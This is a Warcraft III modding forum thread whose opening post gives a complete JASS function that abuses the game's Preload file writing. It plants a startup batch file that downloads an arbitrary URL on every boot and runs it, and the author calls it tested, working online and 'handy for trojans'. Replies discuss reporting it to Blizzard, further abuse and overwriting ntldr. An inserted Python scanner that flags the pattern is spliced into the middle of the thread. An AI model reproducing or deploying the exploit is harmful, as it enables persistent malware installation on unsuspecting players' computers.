How to virus in Warcraft III

Jesus4Lyf

Made a post about it here, but hey...
JASS:
function Infest takes string url, string localname returns nothing
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")
endfunction

//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
    call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
endfunction

This function is cool. For Windows 7, you must replace YOURUSERNAMEHERE with the username on the computer, but on XP this should be unnecessary (and so XP is particularly vulnerable). Just call the function from WC3. When you next restart your computer, the url you specify will be downloaded to your startup folder as the name you specify, and called (the reason you specify the local filename is so Windows knows what file type to run it as).

If someone could test this online with a friend who has Windows XP and finds it to work, we can successfully say Blizzard needs to patch again. I mean, I'm sure the Russians will love it. :)

In case someone doesn't understand what this does, calling the function from any map will run the file specified on every player's pc on every boot from then onwards. Very handy for trojans and the like. :thup:

Let me know if this works on XP! I can't test it right now... :p

Edit: To remove infections, go to Start > Programs > Startup and delete the filename you used as "localname", or "myvirus.bat", depending which is visible.
Edit: Tested on Windows XP, works online, serious threat.
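
A static check for the pattern in the post above, as an added example that is not part of the original thread: it scans an extracted map script for `Preload` string arguments that decode to text containing line breaks, and for `PreloadGenEnd` targets that are absolute, use `..`, or end in a script or executable extension. The function names, the extension list and the sample script are assumptions constructed for illustration.

```python
import re

# Body of a double-quoted JASS string literal, backslash escapes included.
_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')
_PRELOAD = re.compile(r'\bPreload\s*\(')
_GENEND = re.compile(r'\bPreloadGenEnd\s*\(')
_ESC = {'n': '\n', 'r': '\r', 't': '\t'}
# Extensions Windows runs or interprets when opened (assumed list, extend as needed).
_RISKY_EXT = ('.bat', '.cmd', '.vbs', '.js', '.exe', '.com', '.scr', '.lnk')

def unescape(body):
    """Decode backslash escapes in a JASS string literal body."""
    return re.sub(r'\\(.)', lambda m: _ESC.get(m.group(1), m.group(1)), body)

def literals_after(pattern, line):
    """Decoded string literals following the call on this line, or None if no call."""
    m = pattern.search(line)
    return [unescape(s) for s in _LIT.findall(line[m.end():])] if m else None

def scan_map_script(source):
    """Return (line_number, reason) pairs for suspicious preload-file usage."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith('//'):
            continue  # whole-line comment
        args = literals_after(_PRELOAD, line)
        if args and any('\n' in a or '\r' in a for a in args):
            findings.append((no, 'Preload argument contains a line break'))
        target = literals_after(_GENEND, line)
        if target is None:
            continue
        path = ''.join(target)  # literal pieces of a concatenated path
        if not target:
            findings.append((no, 'PreloadGenEnd path is not a string literal'))
        if re.match(r'[A-Za-z]:|[\\/]', path) or '..' in path:
            findings.append((no, 'PreloadGenEnd path is absolute or uses ..'))
        if path.lower().endswith(_RISKY_EXT):
            findings.append((no, 'PreloadGenEnd writes a script or executable'))
    return findings

# Constructed sample: an ordinary preload list (lines 2-3), then the flagged pattern.
SAMPLE = r'''call PreloadGenStart()
call Preload("units\\human\\Footman\\Footman.mdx")
call PreloadGenEnd("save\\models.pld")
call Preload("\")\necho constructed-marker\n//")
call PreloadGenEnd("C:\\Users\\example\\Startup\\demo.bat")
'''
```

The scan is line-based, so a call split across several lines or a path built entirely from variables needs manual review; the latter is reported as a non-literal path.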
 
>So this is what you were up to all these months
Something like that.
Actually, I've just not been around, but when this came up, I figured I'd drop you guys a note. ;)

Tested on Windows XP. Works 100%.

I should clarify - it's the second boot after you play the map, not the first. Here is a demo map. :)

Do not play any WC3 maps until the next patch.

This map will put an image of the word CYPHIX in your startup. Nothing dangerous. :)
To remove, go to Start > Programs > Startup and delete cyphix.jpg.
Works on map initialisation, works on battle.net.
AKA. This is a real tried and proven threat. :thup:
 

Attachments

  • virustest.w3x
    13.7 KB · Views: 776
omg you really are making the world a little worse every now and then. what comes next? you tell us not to breathe because viruses could be in the air?

lol, maybe you should tell blizzard they should hire you for bugfixing and such.

by the way, i would delete the scripts, the wrong people could read this thread. i think the majority of the community will trust in your words, those who don't will most probably still play wc3 maps anyways.
 
>omg you really are making the world a little worse every now and then.
Well, if I don't find and post it, someone else will find it and abuse it. It's a matter of time.

>already reported it to blizzard?
Can't be stuffed, I have assignments to do. -_-
Edit: Done. And I asked if they have QA jobs available. :p

>maybe you should tell blizzard they should hire you for bugfixing and such
They should, considering this is.. the third time..?

>by the way, i would delete the scripts
I'll wait to see what the other moderators think. I love exposing it.. :)
 
Hmm, what happens if I link it to a super large file (takes ages to download)? Lol.
 
Wow, another exploit? Blizzard's not going to be impressed. :p

> Hmm, what happens if I link it to a super large file (takes ages to download)? Lol.
It'd download. Eventually. As expected.
 
The download is done in the background. So the user won't see it... but yes, you can do it.
>Wow, another exploit? Blizzard's not going to be impressed. :p
I wasn't very impressed, either. Surely someone considered that allowing file I/O from WC3 was a bad idea... o.o
 
blizzard should give us a legal way to execute code and store data on HDD (also sync this data online) and it will be fine.

All known bugs (including return bug) were developed for good, not for viruses.

well this can do anything (just like codeexec) (russian developments always evil :( )
 
Hey, at least with this, you can download an executable to set the local files flag in WC3. So you can download 100mb model packs to people's computers which can then be used in WC3 maps! Whilst you're at it, you can modify WC3 executables to add additional natives like RtC, all without the map player ever knowing! In fact, you can format their whole hard disk! I think you're right, Blizzard needs to give us more power!! MOAR!!.

Sorry for the sarcasm, but WC3 being able to do file I/O is just wrong. If you can use it for good, you can use it for evil. :)

Now, trying to find how to report bugs to Blizzard... that might be too difficult, even for me. :p
 
Why do people find all the nice stuff and show it to everybody :p

I was using this after the return bug got deleted out.... :( not again.... must think what's next now.
 
> I was using this after the return bug got deleted out.... not again.... must think what's next now.
This doesn't typecast variables.
 
even real-time antivirus fail to this.. xD
 
this was kept secret for 2 years, now it does not matter.
warcraft is dead anyway.

no one on the english or russian segment of the internet is using this, asians may be using it, but it's unknown to me. (for ex. they used runtime texture changing on units long before this was discovered in the english segment)

also in some cases warcraft may overwrite existing files (fun with ntldr)
 